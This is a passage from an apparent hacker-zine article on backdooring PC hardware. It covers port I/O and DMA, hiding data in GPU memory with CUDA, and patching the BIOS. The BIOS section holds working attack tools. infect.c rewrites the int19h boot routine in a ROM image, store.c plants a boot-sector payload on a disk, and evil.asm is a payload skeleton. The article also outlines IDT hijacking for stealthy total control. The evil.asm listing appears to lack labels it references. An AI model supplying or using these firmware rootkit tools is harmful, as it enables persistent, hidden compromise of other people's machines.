address. For example, to write a byte to the I/O address $378 you would use
an instruction sequence like the following:

   mov dx, $378
   out dx, al


      DMA

     DMA stands for Direct Memory Access. The DMA system is used to
improve device-to-memory transfer performance. Back in the old days, most
hardware made use of the CPU to transfer data to and from memory. When
computers started to become "multimedia" (a term as meaningless as "people
ready" but really good looking in "we-are-trying-to-fuck-you-deep-in-the-ass
ads"), that is when computers started to come equipped with CD-ROM drives
and sound cards, the CPU couldn't handle tasks such as playing music while
displaying a shotgun firing at a monster just because the user hit the
'CTRL' key. So, manufacturers created a new chip able to carry out such
things, and so was born the DMA controller. DMA allows devices to transfer
data from and to memory with very little CPU involvement. Basically, all
the CPU does is initiate the DMA transfer, and then the DMA chip takes care
of the rest, allowing the CPU to focus on other tasks. The very interesting
thing is that since the CPU doesn't actually do the transfer and since
devices are being used, protected mode does not interfere, which means we
can read and write (almost) anywhere we would like to. This idea is far
from being new, and PHC already evoked it in one of their Phrack parodies.

      DMA is really a powerful system. It allows us to do very cool
tricks but this comes at a great price : DMA is a pain in the ass to use
as it is very hardware specific. Here are the main kinds of DMA systems :

	- DMA Controller (third-party DMA) : this DMA system is really old
and inefficient. The idea here is to have a general DMA Controller on the
motherboard that will handle all DMA operations for all devices. This
controller was mainly used with ISA devices and its use is now deprecated
because of performance issues and because only 4 to 8 DMA transfers
(depending on whether the board had two cascading DMA Controllers) could
be set up at the same time (a DMA Controller only provides 4 channels).

	- DMA Bus mastering (first-party DMA) : this DMA system provides
far better performance than the DMA Controller. The idea is to allow each
device to manage DMA itself through a process known as "Bus Mastering".
Instead of relying on the general DMA Controller, each device is able to
take control of the system bus to perform its transfers, allowing hardware
manufacturers to provide an efficient system for their devices.

    These three things are practical enough to get started, but modern
operating systems provide means to access I/O too. As there are a lot of
these systems on the computer market, I'll introduce only the GNU/Linux
system, which constitutes a perfect system to discover hardware hacking on
Intel. Like many systems, Linux runs in two modes : user land and kernel
land. Since kernel land already allows good control over the system, let's
see the user land ways to access I/O. I'll explain here two basic ways to
play with hardware : the in*()/out*() functions and /dev/port :


    The in and out instructions can be used on Linux in user land.
Similarly, the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2)
are provided to play with I/O and can be called from kernel land or user
land. As stated in "Linux Device Drivers" (see [2]), their use is the
following :

    unsigned	inb(unsigned port);
    void	outb(unsigned char byte, unsigned port);

Read or write byte ports (eight bits wide). The port argument is defined as
unsigned long for some platforms and unsigned short for others. The return
type of inb is also different across architectures.

   unsigned	inw(unsigned port);
   void		outw(unsigned short word, unsigned port);

These functions access 16-bit ports (word wide); they are not available
when compiling for the M68k and S390 platforms, which support only byte
I/O.

   unsigned	inl(unsigned port);
   void		outl(unsigned longword, unsigned port);

These functions access 32-bit ports. longword is either declared as
unsigned long or unsigned int, according to the platform. Like word I/O,
"long" I/O is not available on M68k and S390.

    Note that no 64-bit port I/O operations are defined. Even on 64-bit
architectures, the port address space uses a 32-bit (maximum) data path.

    The only restriction on accessing I/O ports this way from user land
is that you must first call the iopl(2) or ioperm(2) functions, which are
sometimes protected by security systems like grsec. And of course, you
must be root. Here is a sample code using this way to access I/O :


/*
** Just a simple code to see how to play with inb()/outb() functions.
** usage is :
**	* read : io r <port address>
**	* write : io w <port address> <value>
** compile with : gcc io.c -o io
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/io.h>	/* iopl(2) inb(2) outb(2) */

void		read_io(long port)
{
  unsigned int	val;

  val = inb(port);
  fprintf(stdout, "value : %X\n", val);
}

void		write_io(long port, long value)
{
  outb(value, port);
}

int	main(int argc, char **argv)
{
  long	port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
      return 1;
    }
  port = atoi(argv[2]);
  if (iopl(3) == -1)
    {
      fprintf(stderr, "could not get permissions to I/O system\n");
      return 1;
    }
  if (!strcmp(argv[1], "r"))
    read_io(port);
  else if (!strcmp(argv[1], "w") && argc == 4)
    write_io(port, atoi(argv[3]));
  else
    fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;
}


    /dev/port is a special file that allows you to access I/O as if you
were manipulating a simple file. The use of the functions open(2), read(2),
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go
to the address corresponding to the port with lseek() and read() or write()
to the hardware. Here is a sample code to do it :


/*
** Just a simple code to see how to play with /dev/port
** usage is :
**	* read : port r <port address>
**	* write : port w <port address> <value>
** compile with : gcc port.c -o port
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

void		read_port(int fd, long port)
{
  unsigned int	val = 0;

  lseek(fd, port, SEEK_SET);
  read(fd, &val, sizeof(char));
  fprintf(stdout, "value : %X\n", val);
}

void		write_port(int fd, long port, long value)
{
  lseek(fd, port, SEEK_SET);
  write(fd, &value, sizeof(char));
}

int	main(int argc, char **argv)
{
  int	fd;
  long	port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
      return 1;
    }
  port = atoi(argv[2]);
  if ((fd = open("/dev/port", O_RDWR)) == -1)
    {
      fprintf(stderr, "could not open /dev/port\n");
      return 1;
    }
  if (!strcmp(argv[1], "r"))
    read_port(fd, port);
  else if (!strcmp(argv[1], "w") && argc == 4)
    write_port(fd, port, atoi(argv[3]));
  else
    fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
  close(fd);
  return 0;
}

    Ok, one last thing before closing this introduction : for Linux users
who want to list the I/O ports in use on their system, just do a
"cat /proc/ioports", e.g. :

     $ cat /proc/ioports # lists ports from 0000 to FFFF
     0000-001f : dma1
     0020-0021 : pic1
     0040-0043 : timer0
     0050-0053 : timer1
     0060-006f : keyboard
     0080-008f : dma page reg
     00a0-00a1 : pic2
     00c0-00df : dma2
     00f0-00ff : fpu
     0170-0177 : ide1
     01f0-01f7 : ide0
     0213-0213 : ISAPnP
     02f8-02ff : serial
     0376-0376 : ide1
     0378-037a : parport0
     0388-0389 : OPL2/3 (left)
     038a-038b : OPL2/3 (right)
     03c0-03df : vga+
     03f6-03f6 : ide0
     03f8-03ff : serial
     0534-0537 : CS4231
     0a79-0a79 : isapnp write
     0cf8-0cff : PCI conf1
     b800-b8ff : 0000:00:0d.0
       b800-b8ff : 8139too
     d000-d0ff : 0000:00:09.0
       d000-d0ff : 8139too
     d400-d41f : 0000:00:04.2
       d400-d41f : uhci_hcd
     d800-d80f : 0000:00:04.1
       d800-d807 : ide0
       d808-d80f : ide1
     e400-e43f : 0000:00:04.3
       e400-e43f : motherboard
       e400-e403 : PM1a_EVT_BLK
       e404-e405 : PM1a_CNT_BLK
       e408-e40b : PM_TMR
       e40c-e40f : GPE0_BLK
       e410-e415 : ACPI CPU throttle
     e800-e81f : 0000:00:04.3
       e800-e80f : motherboard
         e800-e80f : pnp 00:02

3.  Playing with GPU

     3D cards are just GREAT, period. When you're installing such a card in
your computer, you're not just plugging a device that can render nice
graphics, you're also putting a mini-computer in your own computer. Today's
graphical cards aren't a simple chip anymore. They have memory, they have a
processor, they even have a BIOS ! You can enjoy a LOT of features from
these little things.

     First of all, let's consider what a 3D card really is. 3D cards are
here to enhance your computer's 3D rendering performance and to send
output to your screen for display. As I said, there are three parts that
interest us in our 3v1L doings :

       1/ The Video RAM. It is memory embedded on the card. This memory is
used to store the scene to be rendered and to store computed results. Most
of today's cards come with more than 256 MB of memory, which provides us
with a nice place to store our stuff.

       2/ The Graphical Processing Unit (GPU for short). It constitutes
the processor of your 3D card. Most 3D operations are math, so most GPU
instructions compute math designed for graphics.

       3/ The BIOS. A lot of devices today include their own BIOS. 3D
cards are no exception, and their little BIOS can be very interesting as
it contains the firmware of your 3D card, and when you access a firmware,
well, you can do nearly anything you dream of.

       I'll give ideas about what we can do with these three elements, but
first we need to know how to play with the card. Sadly, as with any device
in your computer, you need the specs of your hardware, and most 3D cards
are not open enough to do whatever we want. But this is not a big problem
in itself as we can use a simple API which will talk to the card for us.
Of course, this prevents us from using tricks on the card in certain
conditions, like in a shellcode, but once you've gained root and can do
whatever pleases you on the system, it isn't an issue anymore. The API I'm
talking about is OpenGL (see [3]), and if you're not already familiar with
it, I suggest you read the tutorials on [4]. OpenGL is a 3D programming
API defined by the OpenGL Architecture Review Board, which is composed of
members from many of the industry's leading graphics vendors. This library
often comes with your drivers and by using it, you can easily develop
portable code that will use the features of the present 3D card.

       As we now know how to communicate with the card, let's take a deeper
look at this piece of hardware. GPUs are used to transform a 3D environment
(the "scene") given by the programmer into a 2D image (your screen).
Basically, a GPU is a computing pipeline applying various mathematical
operations on data. I won't introduce here the complete process of
transforming a 3D scene into a 2D display as it is not the point of this
paper. In our case, all you have to know is :

   1/ The GPU is used to transform input (usually a 3D scene but nothing
prevents us from inputting anything else)

   2/ These transformations are done using mathematical operations commonly
used in graphical programming (and again nothing prevents us from using
those operations for another purpose)

   3/ The pipeline is composed of two main computations each involving
multiple steps of data transformation :

	 - Transformation and Lighting : this step translates 3D objects
	 into 2D nets of polygons (usually triangles), generating a
	 wireframe rendering.

	 - Rasterization : this step takes the wireframe rendering as input
	 data and computes pixels values to be displayed on the screen.

      So now, let's take a look at what we can do with all these features.
What interests us here is to hide data where it would be hard to find it
and to execute instructions outside the processor of the computer. I won't
talk about patching 3D cards firmware as it requires heavy reverse
engineering and as it is very specific for each card, which is not the
subject of this paper.

	First, let's consider instructions execution. Of course, as we are
playing with a 3D card, we can't do everything we can do with a computer
processor like triggering software interrupts, issuing I/O operations or
manipulating memory, but we can do lots of mathematical operations. For
example, we can encrypt and decrypt data with the 3D card's processor,
which can make the reverse engineering task quite painful. Also, it can
speed up programs relying on heavy mathematical operations by letting the
computer processor do other things while the 3D card computes for it. Such
things have already been widely done. In fact, some people are already
having fun using GPUs for various purposes (see [5]). The idea here is to
use the GPU to transform data we feed it with. GPUs provide a system to
program them called "shaders". You can think of shaders as a programmable
hook within the GPU which allows you to add your own routines in the data
transformation process. These hooks can be triggered in two places of the
computing pipeline, depending on the shader you're using. Traditionally,
shaders are used by programmers to add special effects on the rendering
process and as the rendering process is composed of two steps, the GPU
provides two programmable shaders. The first shader is called the
"Vertex shader". This shader is used during the transformation and lighting
step. The second shader is called the "Pixel shader" and this one is used
during the rasterization process.

	  Ok, so now we have two entry points in the GPU system, but this
doesn't tell us how to develop and inject our own routines. Again, as we
are playing in the hardware world, there are several ways to do it,
depending on the hardware and the system you're running on. Shaders use
their own programming languages, some are low level assembly-like
languages, some others are high level C-like languages. The three main
languages used today are high level ones :

      - High-Level Shader Language (HLSL) : this language is provided by
      Microsoft's DirectX API, so you need MS Windows to use it. (see [6])

      - OpenGL Shading Language (GLSL or GLSlang) : this language is
      provided by the OpenGL API. (see [7])

      - Cg : this language was introduced by NVIDIA to program on their
      hardware using either the DirectX API or the OpenGL one. Cg comes
      with a full toolkit distributed by NVIDIA for free (see [8] and [9]).

    Now that we know how to program GPUs, let's consider the most
interesting part : data hiding. As I said, 3D cards come with a nice
amount of memory. Of course, this memory is aimed at graphical usage but
nothing prevents us from storing some stuff in it. In fact, with the help
of shaders we can even ask the 3D card to store and encrypt our data. This
is fairly easy to do : we put the data at the beginning of the pipeline,
we program the shaders to decide how to store and encrypt it and we're
done. Then, retrieving this data is nearly the same operation : we ask the
shaders to decrypt it and to send it back to us. Note that this encryption
is really weak, as we rely only on the shaders' computing and as the
encryption and decryption process can be reversed by simply looking at the
shader programming in your code, but it can constitute an effective way to
improve already existing tricks (a 3D card based Shiva could be fun).

    Ok, so now we can start coding stuff taking advantage of our 3D cards.
But wait ! We don't want to mess with shaders, we don't want to learn
about 3D programming, we just want to execute code on the device so we can
quickly test what we can do with those devices. Learning shader
programming is important because it allows you to understand the device
better, but it can take really long for people unfamiliar with the 3D
world. Recently, nVIDIA released an SDK allowing programmers to easily use
3D devices for purposes other than graphics. nVIDIA CUDA (see [10]) is an
SDK allowing programmers to use the C language with new keywords used to
tell the compiler which part of the code should be executed on the device
and which part should be executed on the CPU. CUDA also comes with various
mathematical libraries.

     Here is a funny code to illustrate the use of CUDA :

------[ 3ddb.c

/*
** 3ddb.c : a very simple program used to store an array in
** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <cutil.h>
#include <cuda.h>

/*** GPU code and data ***/

__global__ void	encrypt(char * store, int key)
{
  /* do any encryption you want here */
  /* and put the result into 'store' */
  /* (you need to modify CPU code if */
  /* the encrypted text size is      */
  /* different than the clear text   */
  /* one). */
}

/*** end of GPU code and data ***/

/*** CPU code and data ***/
char *		store;
CUdevice	dev;

void		usage(char * cmd)
{
  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);
  exit(1);
}

void		init_gpu(void)
{
  int		count;

  CU_SAFE_CALL(cuInit(0));
  CU_SAFE_CALL(cuDeviceGetCount(&count));
  if (count <= 0)
    {
      fprintf(stderr, "error : could not connect to any 3D card\n");
      exit(1);
    }
  CU_SAFE_CALL(cuDeviceGet(&dev, 0));
}

int		main(int argc, char ** argv)
{
  int		key;
  size_t	i;
  char *	res;

  if (argc != 3)
    usage(argv[0]);
  init_gpu();
  CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1])));
  CUDA_SAFE_CALL(cudaMemcpy(store, argv[1], strlen(argv[1]),
			    cudaMemcpyHostToDevice));
  res = malloc(strlen(argv[1]));
  key = atoi(argv[2]);
  encrypt<<<128, 256>>>(store, key);
  CUDA_SAFE_CALL(cudaMemcpy(res, store, strlen(argv[1]),
			    cudaMemcpyDeviceToHost));
  for (i = 0; i < strlen(argv[1]); i++)
    printf("%c", res[i]);
  printf("\n");
  CUT_EXIT(argc, argv);
  return 0;
}


4.  Playing with BIOS

     BIOSes are very interesting. In fact, little work has been done in
this area and only some stuff has been published. But let's recap all
these things and take a look at what wonderful tricks we can do with this
little chip. First of all, BIOS means Basic Input/Output System. This chip
is in charge of handling the boot process, low-level configuration and of
providing a set of functions for boot loaders and operating systems during
their early loading process. In fact, at boot time, the BIOS takes control
of the system first, then it does a couple of checks, then it sets up the
real-mode interrupt vector table to provide features via interrupts and
finally tries to load the boot loader located on each bootable device,
following its configuration. For example, if you specify in your BIOS
setup to first try to boot on the optical drive and then on your
harddrive, at boot time the BIOS will first try to run an OS from the CD,
then from your harddrive. BIOS code is the VERY FIRST code to be executed
on your system. The interesting thing is that backdooring it virtually
gives us deep control of the system and a practical way to bypass nearly
any security system running on the target, since we execute code even
before that system starts ! But the drawback is big : as we are playing
with hardware, portability becomes a really big issue.

     The first thing you need to know about playing with BIOS is that there
are several ways to do it. Some really good publications (see [11]) have
been made on the subject, but I'll focus on what we can do when patching
the ROM containing the BIOS.

      BIOSes are stored in a chip located on your motherboard. Old BIOSes
were single ROMs without write capability, but then some manufacturers
got the brilliant idea of allowing BIOS patching. They introduced the BIOS
flasher, which is a little device we can communicate with using the I/O
system. The flasher can read and write the BIOS for us, which is all we
need to play in this land. Of course, as there are many different BIOSes
in the wild, I won't introduce any particular chip. Here are some pointers
that will help you :

      * [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
It is a kernel module for Linux that creates devices to easily manipulate
various BIOSes. It can access several BIOSes, including network card
BIOSes. It is a nice tool to play with and the code is nice, so you'll see
how to get your hands dirty.

      * [14] is a WONDERFUL guide that explains nearly everything about
Award BIOSes. This paper is a must read for anyone interested in this
subject, even if you don't own an Award BIOS.

      * [15] is an interesting website to find information about various
BIOSes.

      In order to start easy and fast, we'll use a virtual machine, which
is very handy to test your concepts before you waste your real BIOS. I
recommend using Bochs (see [16]) as it is free and open source and mainly
because it comes with a very well commented source code used to emulate a
BIOS. But first, let's see how BIOSes really work.

       As I said, the BIOS is the first entity to have control over your
system at boot time. The interesting thing is that, in order to start
reverse engineering your BIOS, you don't even need to use the flasher. At
the start of the boot process, the BIOS's code is mapped (or "shadowed")
in RAM at a specific location and uses a specific range of memory. All we
have to do to read this code, which is 16 bit assembly, is to read memory.
The BIOS memory area starts at 0xf0000 and ends at 0x100000. An easy way
to dump the code is to simply do a :

   % dd if=/dev/mem of=BIOS.dump bs=1 count=65536 seek=983040
   % objdump -b binary -m i8086 -D BIOS.dump

   You should note that as the BIOS contains data, such a dump isn't
accurate as you will have a shift preventing the code from being
disassembled correctly. To address this problem, you should use the entry
point table provided further below and use objdump with the
'--start-address' option.

      Of course, the code you see in memory is rarely easy to retrieve
from the chip, but the fact that you get a somewhat "unencrypted text" can
help a lot. To start seeing what is interesting in this code, let's have a
look at a very interesting comment in the Bochs BIOS source code
(from [17]) :

	 30 // ROM BIOS compatability entry points:
	 31 // ===================================
	 32 // $e05b ; POST Entry Point
	 33 // $e2c3 ; NMI Handler Entry Point
	 34 // $e3fe ; INT 13h Fixed Disk Services Entry Point
	 35 // $e401 ; Fixed Disk Parameter Table
	 36 // $e6f2 ; INT 19h Boot Load Service Entry Point
	 37 // $e6f5 ; Configuration Data Table
	 38 // $e729 ; Baud Rate Generator Table
	 39 // $e739 ; INT 14h Serial Communications Service Entry Point
	 40 // $e82e ; INT 16h Keyboard Service Entry Point
	 41 // $e987 ; INT 09h Keyboard Service Entry Point
	 42 // $ec59 ; INT 13h Diskette Service Entry Point
	 43 // $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
	 44 // $efc7 ; Diskette Controller Parameter Table
	 45 // $efd2 ; INT 17h Printer Service Entry Point
	 46 // $f045 ; INT 10 Functions 0-Fh Entry Point
	 47 // $f065 ; INT 10h Video Support Service Entry Point
	 48 // $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
	 49 // $f841 ; INT 12h Memory Size Service Entry Point
	 50 // $f84d ; INT 11h Equipment List Service Entry Point
	 51 // $f859 ; INT 15h System Services Entry Point
	 52 // $fa6e ; Character Font for 320x200 & 640x200 Graphics \
	 (lower 128 characters)
	 53 // $fe6e ; INT 1Ah Time-of-day Service Entry Point
	 54 // $fea5 ; INT 08h System Timer ISR Entry Point
	 55 // $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
	 56 // $ff53 ; IRET Instruction for Dummy Interrupt Handler
	 57 // $ff54 ; INT 05h Print Screen Service Entry Point
	 58 // $fff0 ; Power-up Entry Point
	 59 // $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
	 60 // $fffe ; System Model ID

	 These offsets indicate where to find specific BIOS
functionalities in memory and, as they are standard, you can apply them to
your BIOS too. For example, the BIOS interrupt 19h is located in memory at
0xfe6f2 and its job is to load the boot loader into RAM and to jump to it.
On old systems, a little trick was to jump to this memory location to
reboot the system. But before considering BIOS code modification, we have
one issue to resolve : BIOS chips have limited space, and while they can
provide enough space for basic backdoors, we'll quickly end up begging for
more places to store code if we want to do something nice. We have two
ways to get more space :

     1/ We patch the int19h code so that instead of loading the real
bootloader from the device specified, it loads our code (which will load
the real bootloader once it's done) from a specific location, like a
sector marked as defective on a specific hard drive. Of course, this
operation implies the alteration of another medium than the BIOS, but,
since it provides us with nearly as much space as we could dream of, this
method must be taken into consideration.

     2/ If you absolutely want to stay in BIOS space, you can do a little
trick on some BIOS models. One day, processor manufacturers made a deal
with BIOS manufacturers : to fix bugs without having to recall all sold
material (remember the f00f bug ?), they decided to give the possibility
to update the CPU's microcode. The idea was that the BIOS would store the
updated microcode and inject it into the CPU during each boot process, as
modifications on microcode aren't permanent. This feature is known as
"BIOS update". Of course, this microcode takes space, so we can search for
the code injecting it, hook it so it doesn't do anything anymore and erase
the microcode to store our own code.

	  Implementing 2/ is more complex than 1/, so we'll focus on the
first one to get started. The idea is to make the BIOS load our own code
before the bootloader. This is very easy to do. Again, BochsBIOS sources
will come in handy, and if you look at your BIOS dump, you should see very
few differences. The code which interests us is located at 0xfe6f2 and is
the 19h BIOS interrupt, the one in charge of loading the boot loader.
Let's take a look at the interesting part of its code :

       7238   // We have to boot from harddisk or floppy
       7239   if (bootcd == 0) {
       7240     bootseg=0x07c0;
       7242 ASM_START
       7243     push bp	
       7244     mov  bp, sp
       7246     mov  ax, #0x0000
       7247     mov  _int19_function.status + 2[bp], ax	
       7248     mov  dl, _int19_function.bootdrv + 2[bp]
       7249     mov  ax, _int19_function.bootseg + 2[bp]
       7250     mov  es, ax         ;; segment		
       7251     mov  bx, #0x0000    ;; offset		
       7252     mov  ah, #0x02      ;; function 2, read diskette sector
       7253     mov  al, #0x01      ;; read 1 sector	
       7254     mov  ch, #0x00      ;; track 0		
       7255     mov  cl, #0x01      ;; sector 1		
       7256     mov  dh, #0x00      ;; head 0
       7257     int  #0x13          ;; read sector
       7258     jnc  int19_load_done
       7259     mov  ax, #0x0001
       7260     mov  _int19_function.status + 2[bp], ax
       7262 int19_load_done:
       7263     pop  bp
       7264 ASM_END

	int13h is the BIOS interrupt used to access storage devices. In
our case, the BIOS is trying to load the boot loader, which is on the
first sector of the drive. The interesting thing is that by only changing
the value put in one register, we can make the BIOS load our own code. For
instance, if we hide our code in sector number 0xN and if we patch the
BIOS so that instead of the instruction 'mov cl, #0x01' we have
'mov cl, #0xN', we can have our code loaded at each boot and reboot.
Basically, we can store our code wherever we want as we can change the
sector, the track and even the drive to be used. It is up to you to choose
where to store your code but as I said, a sector marked as defective can
work out as an interesting trick.

       Here are three source codes to help you get started faster : the
first one, infect.c, modifies the ROM of the BIOS so that it loads our
code before the boot loader. infect.c needs /dev/bios to run. The second
one, evil.asm, is a skeleton to be filled with your own code and is loaded
by the BIOS instead of the real boot loader. The third one, store.c,
injects evil.asm into the target sector of the first track of the hard
drive.

--[ infect.c

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define BUFSIZE		512
#define BIOS_DEV	"/dev/bios"

#define CODE		"\xbb\x00\x00"  /* mov bx, 0 */ \
			"\xb4\x02"      /* mov ah, 2 */ \
			"\xb0\x01"      /* mov al, 1 */ \
			"\xb5\x00"      /* mov ch, 0 */ \
			"\xb6\x00"      /* mov dh, 0 */ \
			"\xb1\x01"      /* mov cl, 1 */ \
			"\xcd\x13"      /* int 0x13 */

#define TO_PATCH	"\xb1\x01" 	 /* mov cl, 1 */
#define SECTOR_OFFSET	1		 /* immediate byte of mov cl */

void	usage(char *cmd)
{
  fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);
  exit(1);
}

/*
** This function looks in the BIOS rom and searches the int19h procedure.
** The algorithm used sucks, as it does only a naive search. Interested
** readers should change it.
*/
char *	search(char * buf, size_t size)
{
  return memmem(buf, size, CODE, sizeof(CODE) - 1);
}

void	patch(char * tgt, size_t size, int sector)
{
  char		new;
  char *	tmp;

  tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH) - 1);
  new = (char)sector;
  tmp[SECTOR_OFFSET] = new;
}

int		main(int argc, char **argv)
{
  int		sector;
  size_t	i;
  ssize_t	ret;
  size_t       	cnt;
  int		devfd;
  int		outfd;
  char *	buf;
  char *	dev;
  char *	out;
  char *	tgt;

  if (argc == 3)
    {
      dev = BIOS_DEV;
      out = argv[2];
      sector = atoi(argv[1]);
    }
  else if (argc == 4)
    {
      dev = argv[1];
      out = argv[3];
      sector = atoi(argv[2]);
    }
  else
    usage(argv[0]);
  if ((devfd = open(dev, O_RDONLY)) == -1)
    {
      fprintf(stderr, "could not open BIOS\n");
      exit(1);
    }
  if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT, 0644)) == -1)
    {
      fprintf(stderr, "could not open %s\n", out);
      exit(1);
    }
  buf = NULL;
  for (cnt = 0; ; cnt += ret)
    {
      buf = realloc(buf, cnt + BUFSIZE);
      if ((ret = read(devfd, buf + cnt, BUFSIZE)) <= 0)
	break;
    }
  if (ret == -1)
    {
      fprintf(stderr, "error reading BIOS\n");
      exit(1);
    }
  if ((tgt = search(buf, cnt)) == NULL)
    {
      fprintf(stderr, "could not find code to patch\n");
      exit(1);
    }
  patch(tgt, cnt - (tgt - buf), sector);
  for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > 0; i += ret)
    ;
  if (ret == -1)
    {
      fprintf(stderr, "could not write patched ROM to disk\n");
      exit(1);
    }
  return 0;
}


--[ evil.asm

;;; A sample code to be loaded by an infected BIOS instead of
;;; the real bootloader. It basically moves himself so he can
;;; load the real bootloader and jump on it. Replace the nops
;;; if you want him to do something usefull.
;;; usage is :
;;;		no usage, this code must be loaded by store.c
;;; compile with : nasm -fbin evil.asm -o evil.bin
BITS	16			
ORG	0			

;; we need this label so we can check the code size
	jmp	begin		; jump over data

;; here comes data
drive	db	0		; drive we're working on


	mov	[drive], dl	; get the drive we're working on
	;; segments init
	mov	ax, 0x07C0
	mov	ds, ax
	mov	es, ax

	;; stack init
	mov	ax, 0
	mov	ss, ax
	mov	ax, 0xffff
	mov	sp, ax

	;; move out of the zone so we can load the TRUE boot loader
	mov	ax, 0x7c0
	mov	ds, ax
	mov	ax, 0x100
	mov	es, ax
	mov	si, 0
	mov	di, 0
	mov	cx, 0x200
	rep	movsb
	;; jump to our new location
	jmp	0x100:next

next:				;; to jump to the new location
	;; load the true boot loader
	mov	dl, [drive]
	mov	ax, 0x07C0
	mov	es, ax
	mov	bx, 0
	mov	ah, 2
	mov	al, 1
	mov	ch, 0
	mov	cl, 1
	mov	dh, 0
	int	0x13

	;; do your evil stuff there (ie : infect the boot loader)
	;; execute system
	jmp 	07C0h:0

size    equ     $ - entry
%if size+2 > 512
	%error "code is too large for boot sector"
%endif

times   (512 - size - 2) db 0	; pad to 512 bytes
db      0x55, 0xAA		; boot signature


--[ store.c

/*
** code to be used to store a fake bootloader loaded by an infected BIOS
** usage is :
**		store <device to store on> <sector number> <file to inject>
** compile with : gcc store.c -o store
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define CODE_SIZE	512
#define SECTOR_SIZE	512

void	usage(char *cmd)
{
  fprintf(stderr, "usage is : %s <device> <sector> <code>\n", cmd);
  exit(1);
}

int	main(int argc, char **argv)
{
  int	off;
  int   i;
  int   devfd;
  int	codefd;
  int   cnt;
  char  code[CODE_SIZE];

  if (argc != 4)
    usage(argv[0]);
  if ((devfd = open(argv[1], O_WRONLY)) == -1)
    {
      fprintf(stderr, "error : could not open device\n");
      return 1;
    }
  off = atoi(argv[2]);
  if ((codefd = open(argv[3], O_RDONLY)) == -1)
    {
      fprintf(stderr, "error : could not open code file\n");
      return 1;
    }
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = read(codefd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
      {
	fprintf(stderr, "error reading code\n");
	return 1;
      }
  lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET);
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = write(devfd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
      {
	fprintf(stderr, "error writing code\n");
	return 1;
      }
  printf("Device infected\n");
  return 0;
}


	Okay, now that we can load our code using the BIOS, time has come
to consider what we can do from this position. As we are among the very
first pieces of code to take control of the system, we can do really
interesting things.

	First, we can hijack BIOS interrupts and make them jump to
our code. This is interesting because instead of writing all the code in
the BIOS, we can now hook the BIOS routines, having as much space as we
need and without having to do a lot of reverse engineering.

	Next, we can easily patch the boot loader on-the-fly, as it is our
own code which loads it. In fact, we don't even have to call the true
boot loader if we don't want to: we can make a fake one that loads a
nicely patched kernel based on the real one. Or we can make a fake boot
loader (or even patch the real one on-the-fly) that loads the real kernel
and patches it on the fly. The choice is up to you.

        Finally, I would like to mention one last thing that came to my
mind. Combined with IDTR hijacking, patching the BIOS can assure us
complete control of the system. We can patch the BIOS so that it loads
our own boot loader. This boot loader is a special one: it loads a
mini-OS of our own which sets up an IDT. Then, as we hijacked the IDTR
register (there are several ways to do it, the easiest being patching the
target OS boot process in order to prevent it from erasing our IDT), we
can load the true boot loader, which will load the true kernel. At this
point, our own OS will hijack the entire system with its own IDT,
proxying any interrupt you want and hijacking any event on the system. We
can even use the system clock as a scheduler for the two OSes: the tick
will be caught by our own OS and, depending on the configuration (we can
say for example 10% of the time for our OS and 90% for the real OS), we
can execute our code or give control to the real OS by jumping to its IDT.

	 You can do lots of things simply by patching the BIOS, so I suggest
you implement your own ideas. Remember this is not so difficult,
documentation about this subject already exists and we can really do lots
of things. Just remember to use Bochs for tests before going into the wild;
it certainly isn't fun when smoke comes out of one of the motherboard's
chips.

5.  Conclusion

     So that's it, hardware can be backdoored quite easily. Of course,
what I demonstrated here was just a quick overview. We can do LOTS of
things with hardware, things that can assure us total control of the
computer we're on while remaining stealthy. There is a huge amount of work
to do in this area, as more and more devices become CPU-independent and
implement many features that can be used to do funny things. Imagination
(and portability, sic...) are the only limits.

   For people very interested in having fun in the hardware world, I
suggest taking a look at CPU microcode programming
(start with the AMD K8 reverse engineering, see [18]), network card
BIOSes and the PXE system.

(And hardware hacking can be a fun start to learn to fuck the TCPA system).

6.  References

[1] : The Art of Assembly Programming - Randall Hyde

[2] : Linux Device Drivers - Alessandro Rubini, Jonathan Corbet

[3] : OpenGL

[4] : Neon Helium Productions (NeHe)

[5] : GPGPU

[6] : HLSL tutorial

[7] : GLSL tutorial

[8] : The NVIDIA Cg Toolkit

[9] : NVIDIA Cg tutorial

[10] : nVIDIA CUDA (Compute Unified Device Architecture)

[11] : Implementing and Detecting an ACPI BIOS RootKit - John Heasman

[12] : /dev/bios - Stefan Reinauer

[13] : OpenBIOS initiative

[14] : Award BIOS reverse engineering guide - Pinczakko

[15] : Wim's BIOS

[16] : Bochs IA-32 Emulator Project

[17] : Bochs BIOS source code

[18] : Opteron Exposed: Reverse Engineering AMD K8 Microcode Updates

7.  Thanks

     Without these people, this file wouldn't be, so thanks to them :

	* Auquen, for introducing me the idea of playing with hardware five
	years ago

